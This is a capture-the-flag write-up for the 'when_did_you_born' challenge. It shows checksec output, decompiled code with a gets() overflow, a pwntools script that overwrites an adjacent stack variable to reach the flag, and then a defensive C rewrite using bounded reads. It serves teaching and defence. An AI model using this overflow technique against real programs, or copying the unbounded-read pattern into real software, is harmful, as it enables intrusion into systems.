【攻防世界】: Beginner Area | when_did_you_born
阿新 • Published: 2020-08-01
Check the binary's protections with checksec: a stack canary is present, so start by reading the program logic.
```
[*] '/home/zowie/Downloads/when_did_you_born'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
```
Load the binary into IDA, decompile it, and look for the vulnerability in the pseudocode:
```c
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
  __int64 result; // rax
  char v4; // [rsp+0h] [rbp-20h]
  unsigned int v5; // [rsp+8h] [rbp-18h]
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u);                    // stack canary
  setbuf(stdin, 0LL);
  setbuf(stdout, 0LL);
  setbuf(stderr, 0LL);
  puts("What's Your Birth?");
  __isoc99_scanf("%d", &v5);
  while ( getchar() != 10 )                     // drain the rest of the line
    ;
  if ( v5 == 1926 )
  {
    puts("You Cannot Born In 1926!");
    result = 0LL;
  }
  else
  {
    puts("What's Your Name?");
    gets(&v4);                                  // unbounded read into the 8-byte slot below v5
    printf("You Are Born In %d\n", v5);
    if ( v5 == 1926 )                           // re-checked after the overflow
    {
      puts("You Shall Have Flag.");
      system("cat flag");
    }
    else
    {
      puts("You Are Naive.");
      puts("You Speed One Second Here.");
    }
    result = 0LL;
  }
  return result;
}
```
The program already contains a ready-made `system("cat flag")`. We enter a birth year other than 1926 to pass the first check and reach the `else` branch, then use the `gets` overflow of `v4` to overwrite `v5` with 1926 before the second check. From the stack offsets, `v4` sits at `rbp-0x20` and `v5` at `rbp-0x18`, so 8 bytes of padding followed by the value 1926 reaches `v5`; the 16-byte write stops well short of the canary at `rbp-0x8`, so the stack check still passes.
Hence the exploit:
```python
from pwn import *

# io = process("./when_did_you_born")    # local test
io = remote("IPaddr", port)              # placeholders: fill in the challenge host and port

io.sendlineafter(b'th?', b'1234')        # any year except 1926 enters the else branch
# 8 bytes fill v4 (rbp-0x20); the next 8 land on v5 (rbp-0x18)
payload = b'a' * 8 + p64(1926)
io.sendlineafter(b'me?', payload)
io.interactive()                         # read the flag output
```
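As a defensive counterpart, added here and not part of the original writeup: the same frame shape (an 8-byte name slot directly followed by the year, assumed from the `rbp-0x20` / `rbp-0x18` offsets above) with `gets()` replaced by a bounded read. The helper names `copy_name_bounded`, `flag_granted`, `name_truncated` and `year_survives_overlong_name` are hypothetical names chosen for this example; the 16-byte input they use is constructed to have the shape of the writeup's payload.

```c
#include <stdio.h>
#include <string.h>

/* Layout mirroring the decompiled frame: an 8-byte name slot directly
   followed by the year (assumed from the [rbp-20h] / [rbp-18h] offsets). */
#define NAME_CAP 8

typedef struct {
    char name[NAME_CAP];
    unsigned int year;
} birth_t;

/* Bounded replacement for gets(&v4): copies at most cap-1 bytes of src
   into dst, stops at a newline, always NUL-terminates and never writes
   past dst[cap-1]. Returns 1 if the input had to be truncated, 0 if it fit. */
int copy_name_bounded(char *dst, size_t cap, const char *src)
{
    size_t i = 0;
    if (cap == 0)
        return 1;
    while (i + 1 < cap && src[i] != '\0' && src[i] != '\n') {
        dst[i] = src[i];
        i++;
    }
    dst[i] = '\0';
    return (src[i] != '\0' && src[i] != '\n') ? 1 : 0;
}

/* Convenience wrapper: 1 if name_input does not fit the 8-byte slot. */
int name_truncated(const char *name_input)
{
    char buf[NAME_CAP];
    return copy_name_bounded(buf, sizeof buf, name_input);
}

/* The challenge's two year checks with the bounded copy in between.
   The second check now sees exactly the value the first one accepted,
   so the flag branch (year == 1926 after the name prompt) is unreachable. */
int flag_granted(unsigned int year, const char *name_input)
{
    birth_t b;
    b.year = year;
    if (b.year == 1926)                 /* first check, as in the original */
        return 0;
    copy_name_bounded(b.name, sizeof b.name, name_input);
    return b.year == 1926;              /* second check, as in the original */
}

/* Constructed 16-byte name (8 filler bytes + 8 more, the shape of the
   writeup's payload): returns 1 iff the year survives intact and the
   truncation is reported. */
int year_survives_overlong_name(void)
{
    birth_t b;
    int truncated;
    b.year = 1234;
    truncated = copy_name_bounded(b.name, sizeof b.name, "aaaaaaaaXXXXXXXX");
    return truncated == 1 && b.year == 1234 && strcmp(b.name, "aaaaaaa") == 0;
}

/* Stand-alone version of the challenge loop using fgets instead of gets. */
int main(void)
{
    birth_t b = {{0}, 0};
    int c;
    puts("What's Your Birth?");
    if (scanf("%u", &b.year) != 1)
        return 1;
    while ((c = getchar()) != '\n' && c != EOF)
        ;
    if (b.year == 1926) {
        puts("You Cannot Born In 1926!");
        return 0;
    }
    puts("What's Your Name?");
    /* fgets writes at most NAME_CAP-1 bytes plus NUL: the year cannot be reached */
    if (fgets(b.name, sizeof b.name, stdin) == NULL)
        return 1;
    if (strchr(b.name, '\n') == NULL)   /* over-long line: discard the remainder */
        while ((c = getchar()) != '\n' && c != EOF)
            ;
    printf("You Are Born In %u\n", b.year);
    puts(b.year == 1926 ? "You Shall Have Flag." : "You Are Naive.");
    return 0;
}
```

The fix is the bounded read, not the value check: once the name copy cannot write past its own slot, the second `year == 1926` comparison is redundant, because nothing between the two checks can alter the year. When reviewing similar code, treat any `gets`, `scanf("%s")` or `strcpy` into a stack buffer adjacent to a decision variable as the finding, regardless of whether the canary would catch a longer write.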